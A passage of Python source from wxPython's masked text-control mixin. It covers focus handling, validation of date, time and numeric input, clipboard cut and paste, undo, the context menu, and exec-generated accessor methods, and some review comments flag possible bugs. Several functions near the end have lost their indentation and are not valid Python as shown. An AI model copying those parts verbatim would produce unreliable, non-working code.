    This event handler is currently necessary to work around new default
    behavior as of wxPython2.3.3;
    The TAB key auto selects the entire contents of the wx.TextCtrl *after*
    the EVT_SET_FOCUS event occurs; therefore we can't query/adjust the selection
    *here*, because it hasn't happened yet.  So to prevent this behavior, and
    preserve the correct selection when the focus event is not due to tab,
    we need to pull the following trick:
    """
    # Guard against events delivered while the control is being torn down.
    if self.IsBeingDeleted() or self.GetParent().IsBeingDeleted():
        return
    # Defer the selection fixup until after the default TAB selection occurs.
    wx.CallAfter(self._fixSelection)
    event.Skip()
    self.Refresh()
def _CheckValid(self, candidate=None):
    """
    This is the default validation checking routine; It verifies that the
    current value of the control is a "valid value," and has the side
    effect of coloring the control appropriately.

    Type-specific validation (date/time/numeric) is applied first, then
    the generic list/regex validation.  When called without a candidate,
    the result is stored on the control and formatting is reapplied.
    """
    oldValid = self._valid
    if candidate is None: value = self._GetValue()
    else: value = candidate

    oldvalue = value
    valid = True    # assume True

    if not self.IsDefault(value) and self._isDate:                      ## Date type validation
        valid = self._validateDate(value)
    elif not self.IsDefault(value) and self._isTime:
        valid = self._validateTime(value)
    elif not self.IsDefault(value) and (self._isInt or self._isFloat):  ## Numeric type
        valid = self._validateNumeric(value)

    if valid:   # and not self.IsDefault(value):    ## generic validation accounts for IsDefault()
        ## valid so far; ensure also allowed by any list or regex provided:
        valid = self._validateGeneric(value)

    # NOTE: `not candidate` (rather than `candidate is None`) means an
    # explicit empty-string candidate also updates control state.
    if not candidate:
        self._valid = valid
        self._applyFormatting()
        if self._valid != oldValid:
            pass
    return valid
def _validateGeneric(self, candidate=None):
    """ Validate the current value using the provided list or Regex filter (if any).
    """
    if candidate is None:
        text = self._GetValue()
    else:
        text = candidate

    # Control-wide constraints (index -1) are checked first, then each
    # field in turn; the first failure decides the result.
    for index in [-1] + self._field_indices:
        constraint = self._fields[index]
        lo, hi = constraint._extent
        if not constraint.IsValid(text[lo:hi]):
            return False
    return True
def _validateNumeric(self, candidate=None):
    """ Validate that the value is within the specified range (if specified.)

    Also rejects values whose required digit position is blank and values
    whose digit-grouping characters are misplaced.
    """
    if candidate is None: value = self._GetValue()
    else: value = candidate
    try:
        groupchar = self._fields[0]._groupChar
        if self._isFloat:
            number = float(value.replace(groupchar, '').replace(self._decimalChar, '.').replace('(', '-').replace(')', ''))
        else:
            number = long( value.replace(groupchar, '').replace('(', '-').replace(')', ''))
            if value.strip():
                # integers must have a digit at the alignment-determined position
                if self._fields[0]._alignRight:
                    require_digit_at = self._fields[0]._extent[1]-1
                else:
                    require_digit_at = self._fields[0]._extent[0]
                if value[require_digit_at] not in list(string.digits):
                    valid = False
                    return valid
            # else...
        if self._ctrl_constraints._hasRange:
            valid = self._ctrl_constraints._rangeLow <= number <= self._ctrl_constraints._rangeHigh
        else:
            valid = True
        groupcharpos = value.rfind(groupchar)
        if groupcharpos != -1:  # group char present
            if self._isFloat and groupcharpos > self._decimalpos:
                # 1st one found on right-hand side is past decimal point
                return False
            elif self._isFloat:
                integer = value[:self._decimalpos].strip()
            else:
                integer = value.strip()
            if integer[0] in ('-', '('):
                integer = integer[1:]
            if integer[-1] == ')':
                integer = integer[:-1]

            # every group after the first must be exactly 3 digits;
            # the first group must be at most 3 digits (<= 999)
            parts = integer.split(groupchar)
            for i in range(len(parts)):
                if i == 0 and abs(int(parts[0])) > 999:
                    valid = False
                    break
                elif i > 0 and (len(parts[i]) != 3 or ' ' in parts[i]):
                    valid = False
                    break
    except ValueError:
        valid = False
    return valid
def _validateDate(self, candidate=None):
    """ Validate the current date value using the provided Regex filter.
        Generally used for character types.BufferType

    The value is first normalized via _adjustDate(), split into
    year/month/day per the control's date style, then cross-checked with
    wx.DateTime (which also validates any trailing time portion).
    Returns True if the value parses as a real date (and time).
    """
    if candidate is None: value = self._GetValue()
    else: value = candidate
    text = self._adjustDate(value, force4digit_year=True)   ## Fix the date up before validating it
    valid = True   # assume True until proven otherwise
    try:
        # replace fillChar in each field with space:
        datestr = text[0:self._dateExtent]
        for i in range(3):
            field = self._fields[i]
            start, end = field._extent
            fstr = datestr[start:end]
            # str.replace returns a new string, so the result must be
            # rebound (the previous code discarded it, leaving fill
            # characters in place).
            fstr = fstr.replace(field._fillChar, ' ')
            datestr = datestr[:start] + fstr + datestr[end:]

        year, month, day = _getDateParts( datestr, self._datestyle)
        year = int(year)
        if self._dateExtent == 11:
            # month is spelled with characters; map via lookup table
            month = charmonths_dict[month.lower()]
        else:
            month = int(month)
        day = int(day)
    except ValueError:
        # cannot convert string to integer parts
        valid = False
    except KeyError:
        # cannot convert string to integer month
        valid = False

    if valid:
        # use wxDateTime to unambiguously try to parse the date:
        # ### Note: because wxDateTime is *brain-dead* and expects months 0-11,
        # rather than 1-12, so handle accordingly:
        if month > 12:
            valid = False
        else:
            month -= 1
            try:
                dateHandler = wx.DateTimeFromDMY(day,month,year)
                dateOk = True
            except:
                dateOk = False
            if not dateOk:
                valid = False

    if valid:
        # wxDateTime doesn't take kindly to leading/trailing spaces when parsing,
        # so we eliminate them here:
        timeStr = text[self._dateExtent+1:].strip()         ## time portion of the string
        if timeStr:
            try:
                # ParseTime returns the number of chars consumed; only a
                # full parse counts as valid.
                checkTime = dateHandler.ParseTime(timeStr)
                valid = checkTime == len(timeStr)
            except:
                valid = False
            if not valid:
                pass
    return valid
def _validateTime(self, candidate=None):
    """ Validate the current time value using the provided Regex filter.
        Generally used for character types.BufferType
    """
    # wxDateTime doesn't take kindly to leading/trailing spaces when parsing,
    # so we eliminate them here:
    if candidate is None:
        value = self._GetValue().strip()
    else:
        value = candidate.strip()

    parser = wx.DateTime_Today()
    try:
        # ParseTime reports how many characters it consumed; the value is
        # valid only when the entire string was parsed.
        consumed = parser.ParseTime(value)
    except:
        return False
    return consumed == len(value)
def _OnKillFocus(self,event):
    """ Handler for EVT_KILL_FOCUS event.

    On focus loss, tidies the field under the cursor, re-validates the
    control value, and gives subclasses a hook via _LostFocus().
    """
    # Guard against events delivered while the control is being torn down.
    if self.IsBeingDeleted() or self.GetParent().IsBeingDeleted():
        return
    if self._mask and self._IsEditable():
        self._AdjustField(self._GetInsertionPoint())
        self._CheckValid()      ## Call valid handler
        self._LostFocus()       ## Provided for subclass use
    event.Skip()
def _fixSelection(self):
    """
    This gets called after the TAB traversal selection is made, if the
    focus event was due to this, but before the EVT_LEFT_* events if
    the focus shift was due to a mouse event.

    The trouble is that, a priori, there's no explicit notification of
    why we received the focus event.  However, the whole reason we need to
    do this is because the default behavior on TAB traversal in a wx.TextCtrl is
    now to select the entire contents of the window, something we don't want.
    So we can *now* test the selection range, and if it's "the whole text"
    we can assume the cause, change the insertion point to the start of
    the control, and deselect.
    """
    # can get here if called with wx.CallAfter after underlying
    # control has been destroyed on close, but after focus
    # events
    if not self or not self._mask or not self._IsEditable():
        return

    sel_start, sel_to = self._GetSelection()

    if( sel_start == 0 and sel_to >= len( self._mask )   #(can be greater in numeric controls because of reserved space)
        and (not self._ctrl_constraints._autoSelect or self.IsEmpty() or self.IsDefault() ) ):
        # This isn't normally allowed, and so assume we got here by the new
        # "tab traversal" behavior, so we need to reset the selection
        # and insertion point:
        self._goHome()
        field = self._FindField(self._GetInsertionPoint())
        edit_start, edit_end = field._extent
        if field._selectOnFieldEntry:
            # NOTE(review): `or` binds looser than `and` here, so for float
            # controls edit_start is always reset to 0 regardless of field —
            # confirm this is the intent.
            if self._isFloat or self._isInt and field == self._fields[0]:
                edit_start = 0
            self._SetInsertionPoint(edit_start)
            self._SetSelection(edit_start, edit_end)

        elif field._insertRight:
            self._SetInsertionPoint(edit_end)
            self._SetSelection(edit_end, edit_end)

        elif (self._isFloat or self._isInt):
            text, signpos, right_signpos = self._getAbsValue()
            if text is None or text == self._template:
                integer = self._fields[0]
                edit_start, edit_end = integer._extent

                if integer._selectOnFieldEntry:
                    self._SetInsertionPoint(0)
                    self._SetSelection(0, edit_end)

                elif integer._insertRight:
                    self._SetInsertionPoint(edit_end)
                    self._SetSelection(edit_end, edit_end)
                else:
                    # numeric ctrl is empty; start at beginning after sign
                    self._SetInsertionPoint(signpos+1)  ## Move past minus sign space if signed
                    self._SetSelection(signpos+1, signpos+1)

    elif sel_start > self._goEnd(getPosOnly=True):
        # cursor beyond the end of the user input; go to end of it
        self._goEnd()
    else:
        pass
def _Keypress(self,key):
""" Method provided to override OnChar routine. Return False to force
a skip of the 'normal' OnChar process. Called before class OnChar.
"""
return True
def _LostFocus(self):
""" Method provided for subclasses. _LostFocus() is called after
the class processes its EVT_KILL_FOCUS event code.
"""
pass
def _OnDoubleClick(self, event):
    """On double-click, select the whole field under the cursor."""
    caret = self._GetInsertionPoint()
    lo, hi = self._FindField(caret)._extent
    self._SetInsertionPoint(lo)
    self._SetSelection(lo, hi)
def _Change(self):
""" Method provided for subclasses. Called by internal EVT_TEXT
handler. Return False to override the class handler, True otherwise.
"""
return True
def _Cut(self):
    """
    Replacement for the base control's Cut(): copy the selection to the
    clipboard, then blank the selected area so only the mask template
    remains there.

    Note: must be invoked from a Cut() override in the derived control,
    because mixin methods cannot override a sibling base class's method.
    """
    current = self._GetValue()
    start, end = self._GetSelection()
    # Hand the stripped selection to the system clipboard.
    clip_data = wx.TextDataObject()
    clip_data.SetText(current[start:end].strip())
    wx.TheClipboard.Open()
    wx.TheClipboard.SetData(clip_data)
    wx.TheClipboard.Close()
    # Only erase if something was actually selected.
    if end != start:
        self._OnErase()
# WS Note: overriding Copy is no longer necessary given that you
# can no longer select beyond the last non-empty char in the control.
#
## def _Copy( self ):
## """
## Override the wx.TextCtrl's .Copy function, with our own
## that does validation. Need to strip trailing spaces.
## """
## sel_start, sel_to = self._GetSelection()
## select_len = sel_to - sel_start
## textval = wx.TextCtrl._GetValue(self)
##
## do = wx.TextDataObject()
## do.SetText(textval[sel_start:sel_to].strip())
## wx.TheClipboard.Open()
## wx.TheClipboard.SetData(do)
## wx.TheClipboard.Close()
def _getClipboardContents(self):
    """
    Return the clipboard's current textual contents with surrounding
    whitespace stripped, or None if the clipboard had no text data.
    """
    data = wx.TextDataObject()
    wx.TheClipboard.Open()
    got_data = wx.TheClipboard.GetData(data)
    wx.TheClipboard.Close()
    if got_data:
        # Remove leading and trailing spaces before evaluating contents
        return data.GetText().strip()
    return None
def _validatePaste(self, paste_text, sel_start, sel_to, raise_on_invalid=False):
    """
    Used by the paste routine and field choice validation to see if a
    given slice of paste text is legal for the area in question.

    Returns a 3-tuple (valid, replacement_text, replace_to):
      valid            -- True if the paste can be applied
      replacement_text -- the paste text expanded with any literal
                          template characters that had to be skipped over
      replace_to       -- the position in the control just past the paste
    If raise_on_invalid is True, a ValueError (with a .value attribute
    holding the offending text) is raised instead of returning False.
    """
    select_length = sel_to - sel_start
    maxlength = select_length
    # An empty selection means the paste may run from the cursor to the
    # end of the control; otherwise it must fit within the selection.
    if maxlength == 0:
        maxlength = self._masklength - sel_start
        item = 'control'
    else:
        item = 'selection'
    # Python 2-era unicode normalization: decode byte strings on
    # unicode builds of wx before comparing against the template.
    if 'unicode' in wx.PlatformInfo and type(paste_text) != types.UnicodeType:
        paste_text = paste_text.decode(self._defaultEncoding)
    length_considered = len(paste_text)
    if length_considered > maxlength:
        # Paste is simply too long for the available space.
        if raise_on_invalid:
            if item == 'control':
                ve = ValueError('"%s" will not fit into the control "%s"' % (paste_text, self.name))
                ve.value = paste_text
                raise ve
            else:
                ve = ValueError('"%s" will not fit into the selection' % paste_text)
                ve.value = paste_text
                raise ve
        else:
            return False, None, None
    text = self._template
    valid_paste = True
    replacement_text = ""
    replace_to = sel_start
    i = 0
    # Walk the paste text and the template in lockstep, accepting each
    # character where the mask allows it and skipping over fixed
    # template characters.
    while valid_paste and i < length_considered and replace_to < self._masklength:
        if paste_text[i:] == self._template[replace_to:length_considered]:
            # remainder of paste matches template; skip char-by-char analysis
            replacement_text += paste_text[i:]
            replace_to = i = length_considered
            continue
        # else:
        char = paste_text[i]
        field = self._FindField(replace_to)
        # Apply per-field case coercion unless the field compares
        # case-insensitively anyway.
        if not field._compareNoCase:
            if field._forceupper:
                char = char.upper()
            elif field._forcelower:
                char = char.lower()
        if not self._isTemplateChar(replace_to) and self._isCharAllowed(char, replace_to, allowAutoSelect=False, ignoreInsertRight=True):
            # Editable position and the char is legal there: take it.
            replacement_text += char
            i += 1
            replace_to += 1
        elif( char == self._template[replace_to]
              or (self._signOk and
                    ( (i == 0 and (char == '-' or (self._useParens and char == '(')))
                      or (i == self._masklength - 1 and self._useParens and char == ')') ) ) ):
            # Char matches the fixed template char at this position, or is
            # a legal sign character ('-', '(' at the front, ')' at the end)
            # in a signed numeric control.
            replacement_text += char
            i += 1
            replace_to += 1
        else:
            # Mismatch: try to skip ahead over fixed template characters to
            # the next editable position; if there is none, the paste fails.
            next_entry = self._findNextEntry(replace_to, adjustInsert=False)
            if next_entry == replace_to:
                valid_paste = False
            else:
                replacement_text += self._template[replace_to:next_entry]
                replace_to = next_entry  # so next_entry will be considered on next loop
    if not valid_paste and raise_on_invalid:
        ve = ValueError('"%s" cannot be inserted into the control "%s"' % (paste_text, self.name))
        ve.value = paste_text
        raise ve
    elif i < len(paste_text):
        # Ran out of room in the control before consuming all paste text.
        valid_paste = False
        if raise_on_invalid:
            ve = ValueError('"%s" will not fit into the control "%s"' % (paste_text, self.name))
            ve.value = paste_text
            raise ve
    if valid_paste:
        pass
    return valid_paste, replacement_text, replace_to
def _Paste(self, value=None, raise_on_invalid=False, just_return_value=False):
    """
    Used to override the base control's .Paste() function,
    with our own that does validation.

    value             -- text to paste; if None, the clipboard is used
    raise_on_invalid  -- propagate ValueError from validation instead of
                         beeping and returning (None, -1)
    just_return_value -- compute and return (new_text, replace_to)
                         without modifying the control

    Note: _Paste must be called from a Paste() override in the
    derived control because the mixin functions can't override a
    method of a sibling class.
    """
    if value is None:
        paste_text = self._getClipboardContents()
    else:
        paste_text = value
    if paste_text is not None:
        # Python 2-era unicode normalization for unicode builds of wx.
        if 'unicode' in wx.PlatformInfo and type(paste_text) != types.UnicodeType:
            paste_text = paste_text.decode(self._defaultEncoding)
        # (conversion will raise ValueError if paste isn't legal)
        sel_start, sel_to = self._GetSelection()
        # special case: handle allowInsert fields properly
        field = self._FindField(sel_start)
        edit_start, edit_end = field._extent
        new_pos = None
        if field._allowInsert and sel_to <= edit_end and (sel_start + len(paste_text) < edit_end or field._insertRight):
            if field._insertRight:
                # want to paste to the left; see if it will fit:
                left_text = self._GetValue()[edit_start:sel_start].lstrip()
                if sel_start - (len(left_text) - (sel_to - sel_start) + len(paste_text)) >= edit_start:
                    # will fit! create effective paste text, and move cursor back to do so:
                    paste_text = left_text + paste_text
                    sel_start -= len(left_text)
                    paste_text = paste_text.rjust(sel_to - sel_start)
                else:
                    # won't fit left; paste text remains unchanged
                    pass
            else:
                # insert-left field: keep the text to the right of the
                # selection by appending it to the paste.
                paste_text = paste_text + self._GetValue()[sel_to:edit_end].rstrip()
            new_pos = sel_start + len(paste_text)  # store for subsequent positioning
        # Another special case: paste won't fit, but it's a right-insert field where entire
        # non-empty value is selected, and there's room if the selection is expanded leftward:
        if( len(paste_text) > sel_to - sel_start
            and field._insertRight
            and sel_start > edit_start
            and sel_to >= edit_end
            and not self._GetValue()[edit_start:sel_start].strip() ):
            # text won't fit within selection, but left of selection is empty;
            # check to see if we can expand selection to accommodate the value:
            empty_space = sel_start - edit_start
            amount_needed = len(paste_text) - (sel_to - sel_start)
            if amount_needed <= empty_space:
                sel_start -= amount_needed
        # another special case: deal with signed values properly:
        if self._signOk:
            signedvalue, signpos, right_signpos = self._getSignedValue()
            paste_signpos = paste_text.find('-')
            if paste_signpos == -1:
                paste_signpos = paste_text.find('(')
            # if paste text will result in signed value:
            if paste_signpos != -1 and (sel_start <= signpos
                                        or (field._insertRight and sel_start - len(paste_text) <= signpos)):
                signed = True
            else:
                signed = False
            # remove "sign" from paste text, so we can auto-adjust for sign type after paste:
            paste_text = paste_text.replace('-', ' ').replace('(', ' ').replace(')', '')
        else:
            signed = False
        # another special case: deal with insert-right fields when selection is empty and
        # cursor is at end of field:
        if field._insertRight and sel_start == edit_end and sel_start == sel_to:
            sel_start -= len(paste_text)
            if sel_start < 0:
                sel_start = 0
        raise_on_invalid = raise_on_invalid or field._raiseOnInvalidPaste
        # NOTE(review): bare except only re-raises; it exists so a debug
        # trace could be inserted around validation failures.
        try:
            valid_paste, replacement_text, replace_to = self._validatePaste(paste_text, sel_start, sel_to, raise_on_invalid)
        except:
            raise
        if not valid_paste:
            # paste text not legal for the selection or portion of the
            # control following the cursor; beep (unless silenced) and bail.
            if not wx.Validator_IsSilent():
                wx.Bell()
            return None, -1
        # else...
        text = self._eraseSelection()
        new_text = text[:sel_start] + replacement_text + text[replace_to:]
        if new_text:
            # Pad to full mask length (Python 2 string module function).
            new_text = string.ljust(new_text, self._masklength)
        if signed:
            # Re-apply the sign in the control's configured style
            # (balanced parens or leading minus).
            new_text, signpos, right_signpos = self._getSignedValue(candidate=new_text)
            if new_text:
                if self._useParens:
                    new_text = new_text[:signpos] + '(' + new_text[signpos+1:right_signpos] + ')' + new_text[right_signpos+1:]
                else:
                    new_text = new_text[:signpos] + '-' + new_text[signpos+1:]
                if not self._isNeg:
                    self._isNeg = 1
        if not just_return_value:
            if new_text != self._GetValue():
                self.modified = True
            if new_text == '':
                self.ClearValue()
            else:
                # Defer the value/cursor updates until after the current
                # event completes, as the control may still be processing it.
                wx.CallAfter(self._SetValue, new_text)
                if new_pos is None:
                    new_pos = sel_start + len(replacement_text)
                wx.CallAfter(self._SetInsertionPoint, new_pos)
        else:
            return new_text, replace_to
    elif just_return_value:
        # NOTE(review): if paste_text is None this references sel_to,
        # which was never assigned on this path — looks like a latent
        # NameError; confirm against callers before relying on it.
        return self._GetValue(), sel_to
def _Undo(self, value=None, prev=None, just_return_results=False):
    """
    Provides an Undo() method in base controls.

    Restores the previously recorded value (self._prevValue by default)
    and tries to select the span that changed, using difflib to diff the
    fixed-length current and previous values.  When just_return_results
    is True, returns (prev, (sel_start, sel_to)) without touching the
    control.
    """
    if value is None:
        value = self._GetValue()
    if prev is None:
        prev = self._prevValue
    if prev is None:
        # Nothing recorded to undo to.
        return
    elif value != prev:
        # Determine what to select: (relies on fixed-length strings)
        # (This is a lot harder than it would first appear, because
        # of mask chars that stay fixed, and so break up the "diff"...)

        # Determine where they start to differ:
        i = 0
        length = len(value)  # (both are same length in masked control)
        while( value[:i] == prev[:i] ):
            i += 1
        sel_start = i - 1

        # handle signed values carefully, so undo from signed to unsigned or vice-versa
        # works properly:
        if self._signOk:
            text, signpos, right_signpos = self._getSignedValue(candidate=prev)
            if self._useParens:
                if prev[signpos] == '(' and prev[right_signpos] == ')':
                    self._isNeg = True
                else:
                    self._isNeg = False
                # eliminate source of "far-end" undo difference if using balanced parens:
                value = value.replace(')', ' ')
                prev = prev.replace(')', ' ')
            elif prev[signpos] == '-':
                self._isNeg = True
            else:
                self._isNeg = False
        # Determine where they stop differing in "undo" result:
        sm = difflib.SequenceMatcher(None, a=value, b=prev)
        i, j, k = sm.find_longest_match(sel_start, length, sel_start, length)
        if k == 0:  # no match found; select to end
            sel_to = length
        else:
            code_5tuples = sm.get_opcodes()
            # (debug-only iteration over the opcodes; has no effect)
            for op, i1, i2, j1, j2 in code_5tuples:
                pass
            diff_found = False
            # look backward through operations needed to produce "previous" value;
            # first change wins:
            for next_op in range(len(code_5tuples)-1, -1, -1):
                op, i1, i2, j1, j2 = code_5tuples[next_op]
                field = self._FindField(i2)
                if op == 'insert' and prev[j1:j2] != self._template[j1:j2]:
                    # insert of non-template text: select the inserted span
                    sel_start = j1
                    sel_to = j2
                    diff_found = True
                    break
                elif op == 'delete' and value[i1:i2] != self._template[i1:i2]:
                    edit_start, edit_end = field._extent
                    if field._insertRight and (field._allowInsert or i2 == edit_end):
                        # insert-right fields collapse to a caret at the delete point
                        sel_start = i2
                        sel_to = i2
                    else:
                        sel_start = i1
                        sel_to = j1
                    diff_found = True
                    break
                elif op == 'replace':
                    if not prev[i1:i2].strip() and field._insertRight:
                        # replaced span was blank in an insert-right field:
                        # place the caret, don't select
                        sel_start = sel_to = j2
                    else:
                        sel_start = j1
                        sel_to = j2
                    diff_found = True
                    break
            if diff_found:
                # now go forwards, looking for earlier changes:
                for next_op in range(len(code_5tuples)):
                    op, i1, i2, j1, j2 = code_5tuples[next_op]
                    field = self._FindField(i1)
                    if op == 'equal':
                        continue
                    elif op == 'replace':
                        if field._insertRight:
                            # if replace with spaces in an insert-right control, ignore "forward" replace
                            if not prev[i1:i2].strip():
                                continue
                            elif j1 < i1:
                                sel_start = j1
                            else:
                                sel_start = i1
                        else:
                            sel_start = i1
                        break
                    elif op == 'insert' and not value[i1:i2]:
                        if prev[j1:j2].strip():
                            # item to insert is non-empty
                            sel_start = j1
                            break
                        elif not field._insertRight:
                            # inserted space in an insert-left field still moves the start
                            sel_start = j1
                            break
                    elif op == 'delete':
                        if field._insertRight:
                            if value[i1:i2].lstrip():
                                sel_start = j1
                                break
                            else:
                                continue
                        else:
                            break
                    else:
                        # unknown opcode; we've got what we need
                        break
            if not diff_found:
                # do "left-insert"-centric processing of difference based on l.c.s.:
                if i == j and j != sel_start:   # match starts after start of selection
                    sel_to = sel_start + (j-sel_start)  # select to start of match
                else:
                    sel_to = j                  # (change ends at j)

        # There are several situations where the calculated difference is
        # not what we want to select.  If changing sign, or just adding
        # group characters, we really don't want to highlight the characters
        # changed, but instead leave the cursor where it is.
        # Also, there are situations in which the difference can be ambiguous;
        # Consider:
        #
        #   current value:    11234
        #   previous value:   1111234
        #
        # Where did the cursor actually lie and which 1s were selected on the delete
        # operation?
        #
        # Also, difflib can "get it wrong;" Consider:
        #
        #   current value:    "       128.66"
        #   previous value:   "       121.86"
        #
        # difflib produces the following opcodes, which are sub-optimal:
        #    equal value[0:9] (       12) prev[0:9] (       12)
        #   insert value[9:9] () prev[9:11] (1.)
        #    equal value[9:10] (8) prev[11:12] (8)
        #   delete value[10:11] (.) prev[12:12] ()
        #    equal value[11:12] (6) prev[12:13] (6)
        #   delete value[12:13] (6) prev[13:13] ()
        #
        # This should have been:
        #    equal value[0:9] (       12) prev[0:9] (       12)
        #  replace value[9:11] (8.6) prev[9:11] (1.8)
        #    equal value[12:13] (6) prev[12:13] (6)
        #
        # But it didn't figure this out!
        #
        # To get all this right, we use the previous selection recorded to help us...
        if (sel_start, sel_to) != self._prevSelection:
            prev_sel_start, prev_sel_to = self._prevSelection
            field = self._FindField(sel_start)
            if( self._signOk
                and sel_start < self._masklength
                and (prev[sel_start] in ('-', '(', ')')
                     or value[sel_start] in ('-', '(', ')')) ):
                # change of sign; leave cursor alone...
                sel_start, sel_to = self._prevSelection
            elif field._groupdigits and (value[sel_start:sel_to] == field._groupChar
                                         or prev[sel_start:sel_to] == field._groupChar):
                # do not highlight grouping changes
                sel_start, sel_to = self._prevSelection
            else:
                calc_select_len = sel_to - sel_start
                prev_select_len = prev_sel_to - prev_sel_start
                if prev_select_len >= calc_select_len:
                    # old selection was bigger; trust it:
                    if not field._insertRight:
                        sel_start, sel_to = self._prevSelection
                    else:
                        sel_to = self._prevSelection[1]
                elif( sel_to > prev_sel_to                  # calculated select past last selection
                      and prev_sel_to < len(self._template) # and prev_sel_to not at end of control
                      and sel_to == len(self._template) ):  # and calculated selection goes to end of control
                    i, j, k = sm.find_longest_match(prev_sel_to, length, prev_sel_to, length)
                    if k > 0:
                        # difflib must not have optimized opcodes properly;
                        sel_to = j
                else:
                    # look for possible ambiguous diff:
                    # if last change resulted in no selection, test from resulting cursor position:
                    if prev_sel_start == prev_sel_to:
                        calc_select_len = sel_to - sel_start
                        field = self._FindField(prev_sel_start)
                        # determine which way to search from last cursor position for ambiguous change:
                        if field._insertRight:
                            test_sel_start = prev_sel_start
                            test_sel_to = prev_sel_start + calc_select_len
                        else:
                            test_sel_start = prev_sel_start - calc_select_len
                            test_sel_to = prev_sel_start
                    else:
                        test_sel_start, test_sel_to = prev_sel_start, prev_sel_to
                    # if calculated selection spans characters, and same characters
                    # "before" the previous insertion point are present there as well,
                    # select the ones related to the last known selection instead.
                    if( sel_start != sel_to
                        and test_sel_to < len(self._template)
                        and prev[test_sel_start:test_sel_to] == prev[sel_start:sel_to] ):
                        sel_start, sel_to = test_sel_start, test_sel_to
        # finally, make sure that the old and new values are
        # different where we say they're different:
        while( sel_to - 1 > 0
               and sel_to > sel_start
               and value[sel_to-1:] == prev[sel_to-1:]):
            sel_to -= 1
        while( sel_start + 1 < self._masklength
               and sel_start < sel_to
               and value[:sel_start+1] == prev[:sel_start+1]):
            sel_start += 1
        if just_return_results:
            return prev, (sel_start, sel_to)
        # else...
        self._SetValue(prev)
        self._SetInsertionPoint(sel_start)
        self._SetSelection(sel_start, sel_to)
    else:
        # no difference between previous value and current value
        if just_return_results:
            return prev, self._GetSelection()
def _OnClear(self, event):
    """Context-menu "Delete" handler: empty the control's value."""
    self.ClearValue()
def _OnContextMenu(self, event):
    """
    Build and pop up the right-click context menu (Undo / Cut / Copy /
    Paste / Delete / Select All), routing each entry to the matching
    accelerator handler on this control.
    """
    menu = wx.Menu()
    menu.Append(wx.ID_UNDO, "Undo", "")
    menu.AppendSeparator()
    menu.Append(wx.ID_CUT, "Cut", "")
    menu.Append(wx.ID_COPY, "Copy", "")
    menu.Append(wx.ID_PASTE, "Paste", "")
    menu.Append(wx.ID_CLEAR, "Delete", "")
    menu.AppendSeparator()
    menu.Append(wx.ID_SELECTALL, "Select All", "")
    # Route menu items to the same handlers as the keyboard accelerators.
    wx.EVT_MENU(menu, wx.ID_UNDO, self._OnCtrl_Z)
    wx.EVT_MENU(menu, wx.ID_CUT, self._OnCtrl_X)
    wx.EVT_MENU(menu, wx.ID_COPY, self._OnCtrl_C)
    wx.EVT_MENU(menu, wx.ID_PASTE, self._OnCtrl_V)
    wx.EVT_MENU(menu, wx.ID_CLEAR, self._OnClear)
    wx.EVT_MENU(menu, wx.ID_SELECTALL, self._OnCtrl_A)
    # ## WSS: The base control apparently handles
    # enable/disable of wx.ID_CUT, wx.ID_COPY, wx.ID_PASTE
    # and wx.ID_CLEAR menu items even if the menu is one
    # we created.  However, it doesn't do undo properly,
    # so we're keeping track of previous values ourselves.
    # Therefore, we have to override the default update for
    # that item on the menu:
    wx.EVT_UPDATE_UI(self, wx.ID_UNDO, self._UndoUpdateUI)
    # _UndoUpdateUI reads self._contextMenu while the menu is showing.
    self._contextMenu = menu
    self.PopupMenu(menu, event.GetPosition())
    menu.Destroy()
    self._contextMenu = None
def _UndoUpdateUI(self, event):
    """Enable the context menu's Undo item only when an undo is possible."""
    # Undo is meaningful only when a previous value exists and differs
    # from the current value.
    can_undo = self._prevValue is not None and self._prevValue != self._curValue
    self._contextMenu.Enable(wx.ID_UNDO, can_undo)
def _OnCtrlParametersChanged(self):
"""
Overridable function to allow derived classes to take action as a
result of parameter changes prior to possibly changing the value
of the control.
"""
pass
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
class MaskedEditAccessorsMixin:
    """
    To avoid a ton of boiler-plate, and to automate the getter/setter generation
    for each valid control parameter so we never forget to add the functions when
    adding parameters, this class programmatically adds the masked edit mixin
    parameters to itself.
    (This makes it easier for Designers like Boa to deal with masked controls.)

    To further complicate matters, this is done with an extra level of inheritance,
    so that "general" classes like masked.TextCtrl can have all possible attributes,
    while derived classes, like masked.TimeCtrl and masked.NumCtrl can prevent
    exposure of those optional attributes of their base class that do not make
    sense for their derivation.

    Therefore, we define:
        BaseMaskedTextCtrl(TextCtrl, MaskedEditMixin)
    and
        masked.TextCtrl(BaseMaskedTextCtrl, MaskedEditAccessorsMixin).

    This allows us to then derive:
        masked.NumCtrl( BaseMaskedTextCtrl )
    and not have to expose all the same accessor functions for the
    derived control when they don't all make sense for it.
    """
    # Define the default set of attributes exposed by the most generic masked controls:
    exposed_basectrl_params = MaskedEditMixin.valid_ctrl_params.keys() + Field.valid_params.keys()
    exposed_basectrl_params.remove('index')
    exposed_basectrl_params.remove('extent')
    exposed_basectrl_params.remove('foregroundColour')   # (base class already has this)

    # Generate Get<Param>/Set<Param> accessors for every exposed parameter.
    for param in exposed_basectrl_params:
        propname = param[0].upper() + param[1:]
        exec('def Set%s(self, value): self.SetCtrlParameters(%s=value)' % (propname, param))
        exec('def Get%s(self): return self.GetCtrlParameter("%s")''' % (propname, param))

        if param.find('Colour') != -1:
            # add non-british spellings, for backward-compatibility
            # BUG FIX: str.replace() returns a new string; the original code
            # discarded its result, so the American-spelled ("Color")
            # accessors were never actually created -- the exec calls merely
            # redefined the British-spelled ones.  Rebinding propname makes
            # the aliases real, which is purely additive for callers.
            propname = propname.replace('Colour', 'Color')
            exec('def Set%s(self, value): self.SetCtrlParameters(%s=value)' % (propname, param))
            exec('def Get%s(self): return self.GetCtrlParameter("%s")''' % (propname, param))
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
## these are helper subroutines:
def _movetofloat( origvalue, fmtstring, neg, addseparators=False, sepchar = ',',fillchar=' '):
""" addseparators = add separator character every three numerals if True
"""
fmt0 = fmtstring.split('.')
fmt1 = fmt0[0]
fmt2 = fmt0[1]
val = origvalue.split('.')[0].strip()
ret = fillchar * (len(fmt1)-len(val)) + val + "." + "0" * len(fmt2)
if neg:
ret = '-' + ret[1:]
return (ret,len(fmt1))
def _isDateType( fmtstring ):
""" Checks the mask and returns True if it fits an allowed
date or datetime format.
"""
dateMasks = ("^##/##/####",
"^##-##-####",
"^##.##.####",
"^####/##/##",
"^####-##-##",
"^####.##.##",
"^##/CCC/####",
"^##.CCC.####",
"^##/##/##$",
"^##/##/## ",
"^##/CCC/##$",
"^##.CCC.## ",)
reString = "|".join(dateMasks)
filter = re.compile( reString)
